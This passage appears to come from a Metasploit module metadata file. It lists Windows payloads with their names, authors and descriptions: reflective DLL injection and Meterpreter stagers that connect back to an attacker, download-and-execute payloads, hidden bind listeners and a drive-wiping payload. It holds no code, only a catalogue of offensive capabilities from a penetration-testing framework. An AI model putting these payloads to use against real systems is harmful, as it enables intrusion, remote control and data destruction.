"scriptjunkie <scriptjunkie@scriptjunkie.us>",
"bannedit <bannedit@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a DLL via a reflective loader. \n Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n data/hop/hop.php to the PHP server you wish to use as a hop.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_hop_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_http": {
"name": "Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/dllinject/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-08 06:24:02 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_http_proxy_pstore": {
"name": "Reflective DLL Injection, Reverse HTTP Stager Proxy",
"full_name": "payload/windows/dllinject/reverse_http_proxy_pstore",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_http_proxy_pstore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_ipv6_tcp": {
"name": "Reflective DLL Injection, Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/dllinject/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker over IPv6",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_nonx_tcp": {
"name": "Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/dllinject/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_ord_tcp": {
"name": "Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/dllinject/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp": {
"name": "Reflective DLL Injection, Reverse TCP Stager",
"full_name": "payload/windows/dllinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_allports": {
"name": "Reflective DLL Injection, Reverse All-Port TCP Stager",
"full_name": "payload/windows/dllinject/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_dns": {
"name": "Reflective DLL Injection, Reverse TCP Stager (DNS)",
"full_name": "payload/windows/dllinject/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"RageLtMan"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_rc4": {
"name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/dllinject/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker and receive the second stage RC4-encrypted on the wire (see module name); this obscures the stage from simple traffic inspection but is not an authenticated transport.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_rc4_dns": {
"name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/dllinject/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker (DNS variant, see module name) and receive the second stage RC4-encrypted on the wire; this obscures the stage from simple traffic inspection but is not an authenticated transport.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/dllinject/reverse_tcp_uuid": {
"name": "Reflective DLL Injection, Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/dllinject/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_udp": {
"name": "Reflective DLL Injection, Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/dllinject/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker over UDP with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_winhttp": {
"name": "Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/dllinject/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dns_txt_query_exec": {
"name": "DNS TXT Record Payload Download and Execution",
"full_name": "payload/windows/dns_txt_query_exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "Performs a TXT query against a series of DNS record(s) and executes the returned payload",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/dns_txt_query_exec.rb",
"is_install_path": true,
"ref_name": "windows/dns_txt_query_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/download_exec": {
"name": "Windows Executable Download (http,https,ftp) and Execute",
"full_name": "payload/windows/download_exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "Download an EXE from an HTTP(S)/FTP URL and execute it",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/download_exec.rb",
"is_install_path": true,
"ref_name": "windows/download_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/exec": {
"name": "Windows Execute Command",
"full_name": "payload/windows/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/exec.rb",
"is_install_path": true,
"ref_name": "windows/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/format_all_drives": {
"name": "Windows Drive Formatter",
"full_name": "payload/windows/format_all_drives",
"rank": 0,
"disclosure_date": null,
"type": "payload",
"author": [
"Ashfaq Ansari <ashfaq_ansari1989@hotmail.com>",
"Ruei-Min Jiang <mike820324@gmail.com>"
],
"description": "This payload formats all mounted disks in Windows (aka ShellcodeOfDeath). It is destructive and irreversible: the data on every formatted volume is lost, so run it only against systems you are explicitly authorized to wipe.\n\n After formatting, this payload sets the volume label to the string specified in\n the VOLUMELABEL option. If the code is unable to access a drive for any reason,\n it skips the drive and proceeds to the next volume.",
"references": [
"URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html",
"URL-https://github.com/hacksysteam/ShellcodeOfDeath"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/format_all_drives.rb",
"is_install_path": true,
"ref_name": "windows/format_all_drives",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/loadlibrary": {
"name": "Windows LoadLibrary Path",
"full_name": "payload/windows/loadlibrary",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Load an arbitrary library path",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/loadlibrary.rb",
"is_install_path": true,
"ref_name": "windows/loadlibrary",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/messagebox": {
"name": "Windows MessageBox",
"full_name": "payload/windows/messagebox",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"corelanc0d3r <peter.ve@corelan.be>",
"jduck <jduck@metasploit.com>"
],
"description": "Spawns a dialog via MessageBox using a customizable title, text & icon",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/messagebox.rb",
"is_install_path": true,
"ref_name": "windows/messagebox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_hidden_ipknock_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/meterpreter/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection. First, the port must be knocked from\n the IP defined in KHOST. That source IP is the only authentication the listener performs, and\n it is a plain source-address check that can be spoofed with tools like hping, so anyone able to\n spoof KHOST can unlock the port. After the knock, the stage can be retrieved from any IP. The\n socket will appear as \"closed,\" which helps to hide the listener.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_hidden_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager",
"full_name": "payload/windows/meterpreter/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection on a hidden port and serve the stage to the allowed host (this stager delivers Meterpreter, not a command shell).",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_ipv6_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/meterpreter/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_ipv6_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/meterpreter/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_named_pipe": {
"name": "Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/meterpreter/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"UserExistsError"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a pipe connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_nonx_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/meterpreter/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/bind_tcp_rc4": {
"name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/meterpreter/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection and deliver the second stage RC4-encrypted on the wire (see module name); this obscures the stage from simple traffic inspection but is not an authenticated transport.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/meterpreter/bind_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/find_tag": {
"name": "Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager",
"full_name": "payload/windows/meterpreter/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Use an established connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_hop_http": {
"name": "Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager",
"full_name": "payload/windows/meterpreter/reverse_hop_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"scriptjunkie <scriptjunkie@scriptjunkie.us>",
"bannedit <bannedit@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). \n Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n data/hop/hop.php to the PHP server you wish to use as a hop.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_hop_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_http": {
"name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP (Windows wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-08 06:24:02 +0000",
